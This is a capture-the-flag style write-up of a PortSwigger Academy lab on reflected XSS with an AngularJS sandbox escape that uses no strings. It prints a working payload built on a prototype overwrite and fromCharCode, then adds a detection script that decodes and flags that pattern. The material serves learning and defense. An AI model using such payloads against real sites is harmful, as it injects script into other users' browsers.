Solving Portswigger Academy: Reflected XSS with AngularJS sandbox escape without strings
This lab uses AngularJS in an unusual way where the $eval function is not available and you will be unable to use any strings in AngularJS. To solve the lab, perform a cross-site scripting attack that escapes the sandbox and executes the alert function without using the $eval function.
So we have to execute alert in AngularJS without using the $eval function.
I used various payloads available here, but only one worked for me. Some contain double and single quotes, which are encoded by the application.
The one that worked is below, but when I paste it into the search bar as is, it has more characters than the allowed length, and it says the length is more than 120 characters.
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
But I used this directly in the search box and it solved my problem.
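Why the payload above needs no quotes, shown from the detection side as an added example that is not part of the original write-up: it overwrites charAt through constructor.prototype and builds its string from character codes, which the code below decodes and flags. The function names and indicator labels are assumptions made for this sketch, not part of any library.

```javascript
// Added example: triage a request parameter for the string-free AngularJS
// sandbox-escape pattern quoted on this page.
// decodeFromCharCode / analyzeInput and the indicator names are hypothetical.

function decodeFromCharCode(input) {
  // Find fromCharCode(n, n, ...) calls with purely numeric arguments and decode them.
  const re = /fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;
  const decoded = [];
  for (const m of input.matchAll(re)) {
    const codes = m[1].split(',').map((s) => Number(s.trim()));
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

function analyzeInput(input) {
  const indicators = [];
  // Assignment to a method reached through constructor.prototype
  if (/constructor\s*\.\s*prototype\s*\.\s*\w+\s*=/.test(input)) {
    indicators.push('prototype-overwrite');
  }
  // AngularJS filter syntax (expr|orderBy:expr) appearing in user input
  if (/\|\s*orderBy\s*:/.test(input)) {
    indicators.push('orderBy-filter');
  }
  // Strings assembled from character codes instead of quoted literals
  const decoded = decodeFromCharCode(input);
  if (decoded.length > 0) {
    indicators.push('fromCharCode-string');
  }
  // Two or more indicators together are treated as suspicious in this sketch.
  return { indicators, decoded, suspicious: indicators.length >= 2 };
}

// The payload quoted on this page, plus a constructed benign search term.
const payload =
  'toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:' +
  'toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)';
const benign = 'angular orderBy tutorial'; // constructed sample

console.log(analyzeInput(payload));
console.log(analyzeInput(benign));
```

Run against server-side request logs, a check like this surfaces the pattern even when quote characters are being encoded, since the payload never relies on them.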
